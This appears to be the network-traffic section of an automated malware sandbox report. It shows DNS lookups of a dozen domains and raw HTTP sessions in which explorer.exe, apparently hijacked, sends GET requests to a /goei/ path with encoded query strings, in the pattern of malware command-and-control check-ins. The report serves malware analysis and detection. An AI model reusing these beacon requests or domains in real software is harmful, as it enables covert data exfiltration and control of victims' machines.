                                                                    Apr 8, 2021 12:46:53.672425032 CEST53546838.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:56.255649090 CEST5932953192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:56.274786949 CEST53593298.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:58.687747002 CEST6402153192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:58.728197098 CEST53640218.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:47:03.972100973 CEST5612953192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:47:03.995660067 CEST53561298.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:47:09.055725098 CEST5817753192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:47:09.078679085 CEST53581778.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:47:14.224930048 CEST5070053192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:47:14.548867941 CEST53507008.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:47:21.684954882 CEST5406953192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:47:21.743495941 CEST53540698.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:47:23.284853935 CEST6117853192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:47:23.360908031 CEST53611788.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:47:27.867861986 CEST5701753192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:47:27.880448103 CEST53570178.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:47:28.412189960 CEST5632753192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:47:28.458304882 CEST53563278.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:47:30.204473972 CEST5024353192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:47:30.231271982 CEST53502438.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:47:33.472132921 CEST6205553192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:47:33.581131935 CEST53620558.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:47:38.813100100 CEST6124953192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:47:38.883302927 CEST53612498.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:47:44.016849041 CEST6525253192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:47:44.147923946 CEST53652528.8.8.8192.168.2.6

                                                                    DNS Queries

                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                    Apr 8, 2021 12:46:38.335319042 CEST192.168.2.68.8.8.80xd2c6Standard query (0)www.ly-iot.comA (IP address)IN (0x0001)
                                                                    Apr 8, 2021 12:46:48.030651093 CEST192.168.2.68.8.8.80x5e24Standard query (0)www.ronwongart.comA (IP address)IN (0x0001)
                                                                    Apr 8, 2021 12:46:53.534490108 CEST192.168.2.68.8.8.80xb23Standard query (0)www.vbkulkarni.comA (IP address)IN (0x0001)
                                                                    Apr 8, 2021 12:46:58.687747002 CEST192.168.2.68.8.8.80x75b4Standard query (0)www.pimpmyrecipe.comA (IP address)IN (0x0001)
                                                                    Apr 8, 2021 12:47:03.972100973 CEST192.168.2.68.8.8.80xda46Standard query (0)www.csgo-roll.netA (IP address)IN (0x0001)
                                                                    Apr 8, 2021 12:47:09.055725098 CEST192.168.2.68.8.8.80x43eaStandard query (0)www.foodsystemsjusticeproject.comA (IP address)IN (0x0001)
                                                                    Apr 8, 2021 12:47:14.224930048 CEST192.168.2.68.8.8.80x2ff5Standard query (0)www.batiktintaemas.comA (IP address)IN (0x0001)
                                                                    Apr 8, 2021 12:47:23.284853935 CEST192.168.2.68.8.8.80x5600Standard query (0)www.breathharbour.netA (IP address)IN (0x0001)
                                                                    Apr 8, 2021 12:47:28.412189960 CEST192.168.2.68.8.8.80x1d35Standard query (0)www.libreo.clubA (IP address)IN (0x0001)
                                                                    Apr 8, 2021 12:47:33.472132921 CEST192.168.2.68.8.8.80x3f25Standard query (0)www.addthat.xyzA (IP address)IN (0x0001)
                                                                    Apr 8, 2021 12:47:38.813100100 CEST192.168.2.68.8.8.80x439Standard query (0)www.evecrude.xyzA (IP address)IN (0x0001)
                                                                    Apr 8, 2021 12:47:44.016849041 CEST192.168.2.68.8.8.80xb854Standard query (0)www.generalflix.comA (IP address)IN (0x0001)

                                                                    DNS Answers

                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                    Apr 8, 2021 12:46:38.818474054 CEST8.8.8.8192.168.2.60xd2c6No error (0)www.ly-iot.coml.17986.netCNAME (Canonical name)IN (0x0001)
                                                                    Apr 8, 2021 12:46:38.818474054 CEST8.8.8.8192.168.2.60xd2c6No error (0)l.17986.net104.160.174.177A (IP address)IN (0x0001)
                                                                    Apr 8, 2021 12:46:48.173165083 CEST8.8.8.8192.168.2.60x5e24No error (0)www.ronwongart.com104.161.84.100A (IP address)IN (0x0001)
                                                                    Apr 8, 2021 12:46:53.672425032 CEST8.8.8.8192.168.2.60xb23Name error (3)www.vbkulkarni.comnonenoneA (IP address)IN (0x0001)
                                                                    Apr 8, 2021 12:46:58.728197098 CEST8.8.8.8192.168.2.60x75b4No error (0)www.pimpmyrecipe.comext-cust.squarespace.comCNAME (Canonical name)IN (0x0001)
                                                                    Apr 8, 2021 12:46:58.728197098 CEST8.8.8.8192.168.2.60x75b4No error (0)ext-cust.squarespace.com198.185.159.144A (IP address)IN (0x0001)
                                                                    Apr 8, 2021 12:46:58.728197098 CEST8.8.8.8192.168.2.60x75b4No error (0)ext-cust.squarespace.com198.49.23.144A (IP address)IN (0x0001)
                                                                    Apr 8, 2021 12:46:58.728197098 CEST8.8.8.8192.168.2.60x75b4No error (0)ext-cust.squarespace.com198.49.23.145A (IP address)IN (0x0001)
                                                                    Apr 8, 2021 12:46:58.728197098 CEST8.8.8.8192.168.2.60x75b4No error (0)ext-cust.squarespace.com198.185.159.145A (IP address)IN (0x0001)
                                                                    Apr 8, 2021 12:47:09.078679085 CEST8.8.8.8192.168.2.60x43eaNo error (0)www.foodsystemsjusticeproject.comfoodsystemsjusticeproject.comCNAME (Canonical name)IN (0x0001)
                                                                    Apr 8, 2021 12:47:09.078679085 CEST8.8.8.8192.168.2.60x43eaNo error (0)foodsystemsjusticeproject.com34.102.136.180A (IP address)IN (0x0001)
                                                                    Apr 8, 2021 12:47:14.548867941 CEST8.8.8.8192.168.2.60x2ff5No error (0)www.batiktintaemas.combatiktintaemas.comCNAME (Canonical name)IN (0x0001)
                                                                    Apr 8, 2021 12:47:14.548867941 CEST8.8.8.8192.168.2.60x2ff5No error (0)batiktintaemas.com193.168.194.206A (IP address)IN (0x0001)
                                                                    Apr 8, 2021 12:47:23.360908031 CEST8.8.8.8192.168.2.60x5600Server failure (2)www.breathharbour.netnonenoneA (IP address)IN (0x0001)
                                                                    Apr 8, 2021 12:47:28.458304882 CEST8.8.8.8192.168.2.60x1d35Name error (3)www.libreo.clubnonenoneA (IP address)IN (0x0001)
                                                                    Apr 8, 2021 12:47:33.581131935 CEST8.8.8.8192.168.2.60x3f25No error (0)www.addthat.xyz199.59.242.153A (IP address)IN (0x0001)
                                                                    Apr 8, 2021 12:47:38.883302927 CEST8.8.8.8192.168.2.60x439No error (0)www.evecrude.xyzredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)
                                                                    Apr 8, 2021 12:47:38.883302927 CEST8.8.8.8192.168.2.60x439No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)
                                                                    Apr 8, 2021 12:47:38.883302927 CEST8.8.8.8192.168.2.60x439No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)
                                                                    Apr 8, 2021 12:47:44.147923946 CEST8.8.8.8192.168.2.60xb854No error (0)www.generalflix.comgeneralflix.comCNAME (Canonical name)IN (0x0001)
                                                                    Apr 8, 2021 12:47:44.147923946 CEST8.8.8.8192.168.2.60xb854No error (0)generalflix.com94.46.9.37A (IP address)IN (0x0001)

                                                                    HTTP Request Dependency Graph

                                                                    • www.ly-iot.com
                                                                    • www.ronwongart.com
                                                                    • www.pimpmyrecipe.com
                                                                    • www.foodsystemsjusticeproject.com
                                                                    • www.batiktintaemas.com
                                                                    • www.addthat.xyz
                                                                    • www.evecrude.xyz

                                                                    HTTP Packets

                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    0192.168.2.649723104.160.174.17780C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Apr 8, 2021 12:46:42.498070002 CEST1250OUTGET /goei/?EzuXh6BP=B46qr3zTyBR1t+VKbrees7UR/FiD4WL3nz1lGh06nIBkEBDQrNA0bRgDDyF1Au9+nA9wWbL6eg==&RL0=rVvxj02xpd_lyz HTTP/1.1
                                                                    Host: www.ly-iot.com
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    Apr 8, 2021 12:46:43.287656069 CEST1252INHTTP/1.1 200 OK
                                                                    Server: nginx/1.17.10
                                                                    Date: Thu, 08 Apr 2021 10:46:43 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    X-Powered-By: PHP/7.3.15
                                                                    Data Raw: 31 39 65 33 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 6c 79 2d 69 6f 74 2e 63 6f 6d 20 2d 20 54 68 65 20 64 6f 6d 61 69 6e 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 66 6f 72 20 70 75 72 63 68 61 73 65 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 2f 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 6c 69 62 73 2e 62 61 69 64 75 2e 63 6f 6d 2f 6a 71 75 65 72 79 2f 31 2e 39 2e 30 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 77 69 6e 64 6f 77 2e 73 63 72 65 65 6e 2e 68 65 69 67 68 74 3c 37 30 30 29 7b 24 28 22 2a 22 29 2e 63 73 73 28 7b 22 77 69 64 74 68 22 3a 22 61 75 74 6f 22 2c 22 68 65 69 67 68 74 22 3a 22 61 75 74 6f 22 2c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 22 3a 22 6e 6f 6e 65 22 2c 22 70 6f 73 69 74 69 6f 6e 22 3a 22 73 74 61 74 69 63 22 7d 29 3b 24 28 22 70 22 29 2e 63 73 73 28 22 63 6f 6c 6f 72 22 2c 22 62 6c 61 63 6b 22 29 3b 24 28 22 2e 73 74 65 6e 63 69 6c 2d 74 69 70 22 29 2e 63 73 73 28 22 6c 69 6e 65 2d 68 65 69 67 68 74 22 2c 22 33 30 70 78 22 29 3b 7d 7d 29 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 42 4f 44 59 20 7b 0d 0a 09 46 4f 4e 54 2d 53 49 5a 45 3a 20 31 32 70 78 3b 20 4d 41 52 47 49 4e 3a 20 31 38 70 78 20 30 70 78 20 30 70 78 3b 20 43 4f 4c 4f 52 3a 20 23 34 32 34 32 34 32 3b 20 42 41 43 4b 47 52 4f 55 4e 44 2d 43 4f 4c 4f 52 3a 20 23 66 66 66 3b 20 54 45 58 54 2d 41 4c 49 47 4e 3a 20 63 65 6e 74 65 72 0d 0a 7d 0d 0a 54 44 20 7b 0d 0a 09 46 4f 4e 54 2d 46 41 4d 49 4c 59 3a 20 41 72 69 61 6c 0d 0a 7d 0d 0a 50 20 7b 0d 0a 09 46 4f 4e 54 2d 46 41 4d 49 4c 59 3a 20 41 72 69 61 6c 0d 0a 7d 0d 0a 44 49 56 20 7b 0d 0a 09 46 4f 4e 54 2d 46 41 4d 49 4c 59 3a 20 41 72 69 61 6c 0d 0a 7d 0d 0a 49 4e 50 55 54 20 7b 0d 0a 09 46 4f 4e 54 2d 46 41 4d 49 4c 59 3a 20 41 72 69 61 6c 0d 0a 7d 0d 0a 49 4d 47 20 7b 0d 0a 09 42 4f 52 44 45 52 2d 52 49 47 48 54 3a 20 30 70 78 3b 20 42 4f 52 44 45 52 2d 54 4f 50 3a 20 30 70 78 3b 20 42 4f 52 44 45 52 2d 4c 45 46 54 3a 20 30 70 78 3b 20 42 4f 52 44 45 52 2d 42 4f 54 54 4f 4d 3a 20 30 70 78 0d 0a 7d 0d 0a 54 44 20 7b 0d 0a 09 46 4f 4e 54 2d 53 49 5a 45 3a 20 31 32 70 78 3b 20 4c 49 4e 45 2d 48 45 49 47 48 54 3a 20 31 35 30 25 0d 0a 7d 0d 0a 54 48 20 7b 0d 0a 09 46 4f 4e 54 2d 53 49 5a 45 3a 20 31 32 70 78 3b 20 4c 49 4e 45 2d 48 45 49 47 48 54 3a 20 31 35 30 25 0d 0a 7d 0d 0a 23 66 20 7b 0d 0a 09 4d 41 52 47 49 4e 3a 20 30 70 78 3b 20 50 41 44 44 49 4e 47 2d 54 4f 50 3a 20 34 70 78 0d 0a 7d 0d 0a 23 42 20 7b 0d 0a 09 57 49 44 54 48 3a 20 38 30 30 70 78 0d 0a 7d 0d 0a 2e 68 65 61 64 65 72 20 7b 0d 0a 09 42 4f 52 44 45 52 2d 42 4f 54 54 4f 4d 3a 20 23 62 32 64 30 65 61 20 31 70 78 20 73 6f
                                                                    Data Ascii: 19e3<html> <head> <title>ly-iot.com - The domain is available for purchase</title><meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no"/><script src="http://libs.baidu.com/jquery/1.9.0/jquery.js"></script><script>$(document).ready(function(){if(window.screen.height<700){$("*").css({"width":"auto","height":"auto","background-image":"none","position":"static"});$("p").css("color","black");$(".stencil-tip").css("line-height","30px");}});</script> <style type="text/css">BODY {FONT-SIZE: 12px; MARGIN: 18px 0px 0px; COLOR: #424242; BACKGROUND-COLOR: #fff; TEXT-ALIGN: center}TD {FONT-FAMILY: Arial}P {FONT-FAMILY: Arial}DIV {FONT-FAMILY: Arial}INPUT {FONT-FAMILY: Arial}IMG {BORDER-RIGHT: 0px; BORDER-TOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM: 0px}TD {FONT-SIZE: 12px; LINE-HEIGHT: 150%}TH {FONT-SIZE: 12px; LINE-HEIGHT: 150%}#f {MARGIN: 0px; PADDING-TOP: 4px}#B {WIDTH: 800px}.header {BORDER-BOTTOM: #b2d0ea 1px so
                                                                    Apr 8, 2021 12:46:43.287707090 CEST1253INData Raw: 6c 69 64 3b 20 48 45 49 47 48 54 3a 20 31 33 70 78 0d 0a 7d 0d 0a 2e 68 65 61 64 65 72 20 2e 6c 20 7b 0d 0a 09 46 4c 4f 41 54 3a 20 6c 65 66 74 0d 0a 7d 0d 0a 2e 68 65 61 64 65 72 20 2e 72 20 7b 0d 0a 09 46 4c 4f 41 54 3a 20 72 69 67 68 74 0d 0a
                                                                    Data Ascii: lid; HEIGHT: 13px}.header .l {FLOAT: left}.header .r {FLOAT: right}.word {MARGIN-TOP: 38px;FONT-WEIGHT: bold;FONT-SIZE: 20px;COLOR: #58677d;TEXT-INDENT: 20px;TEXT-ALIGN: left;margin-bottom: 30px;}.wor
                                                                    Apr 8, 2021 12:46:43.287720919 CEST1255INData Raw: 31 32 70 78 3b 20 54 45 58 54 2d 44 45 43 4f 52 41 54 49 4f 4e 3a 20 6e 6f 6e 65 0d 0a 7d 0d 0a 2e 64 6f 77 6e 6c 6f 61 64 20 7b 0d 0a 09 4d 41 52 47 49 4e 2d 42 4f 54 54 4f 4d 3a 20 31 32 70 78 0d 0a 7d 0d 0a 2e 70 68 20 7b 0d 0a 09 43 4f 4c 4f
                                                                    Data Ascii: 12px; TEXT-DECORATION: none}.download {MARGIN-BOTTOM: 12px}.ph {COLOR: #333333}.pg {COLOR: #737373}.style2 {font-size: 16px}.style3 {color: #FF0000}.comment {font-size:12px; color:#999; line-height:150%;}
                                                                    Apr 8, 2021 12:46:43.287738085 CEST1256INData Raw: 6e 62 73 70 3b 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 22 3e 26 6e 62 73 70 3b 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61
                                                                    Data Ascii: nbsp;</div> <div class="r">&nbsp;</div> </div> <div class="conter"> <table width="775" cellspacing="0" cellpadding="0"> <tbody> <tr> <td align="center" vali
                                                                    Apr 8, 2021 12:46:43.287756920 CEST1257INData Raw: 70 61 6e 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 74 72 6f 6e 67 3e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                    Data Ascii: pan></div> <strong> </strong></div> </td> <td width="561" valign="top"><br />
                                                                    Apr 8, 2021 12:46:43.287769079 CEST1258INData Raw: 20 20 20 20 20 20 20 3c 70 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 20 31 32 70 78 3b 22 3e 43 6f 70 79 72 69 67 68 74 20 26 63 6f 70 79 3b 20 31 39 39 38 20 2d 20 32 30 30 39 20 3c 61 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 68 72
                                                                    Data Ascii: <p style="height: 12px;">Copyright &copy; 1998 - 2009 <a target="_blank" href="http://www.4.cn">4.cn</a> All Rights Reserved</p> </div> </center> <p>&nbsp;</p> <div style="display:none"><script src="https
                                                                    Apr 8, 2021 12:46:43.287785053 CEST1258INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    1192.168.2.649726104.161.84.10080C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Apr 8, 2021 12:46:48.335388899 CEST1385OUTGET /goei/?EzuXh6BP=GY2gQUF0Rr/aPbkdLLDyshZLrmGphrTrFvzfodUnQAaoW3qjeuccMn3ranK+t6GyiOOsZqKqHA==&RL0=rVvxj02xpd_lyz HTTP/1.1
                                                                    Host: www.ronwongart.com
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    Apr 8, 2021 12:46:48.497931004 CEST1403INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Thu, 08 Apr 2021 10:47:07 GMT
                                                                    Content-Type: text/html; charset=GBK
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Data Raw: 32 33 63 0d 0a 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 23c<html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    2192.168.2.649741198.185.159.14480C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Apr 8, 2021 12:46:58.836958885 CEST5606OUTGET /goei/?EzuXh6BP=TTuxDc9EejbduYk8ZHEjlKcpN/O2EpBILXUKac8y6lhY4fajDGEqKXEgdN9L03N9MJzUHOy50w==&RL0=rVvxj02xpd_lyz HTTP/1.1
                                                                    Host: www.pimpmyrecipe.com
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    Apr 8, 2021 12:46:58.951539993 CEST5609INHTTP/1.1 400 Bad Request
                                                                    Cache-Control: no-cache, must-revalidate
                                                                    Content-Length: 77564
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Date: Thu, 08 Apr 2021 10:46:58 UTC
                                                                    Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                    Pragma: no-cache
                                                                    Server: Squarespace
                                                                    X-Contextid: rofEdlC9/lBVebWxJ
                                                                    Connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20
                                                                    Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;
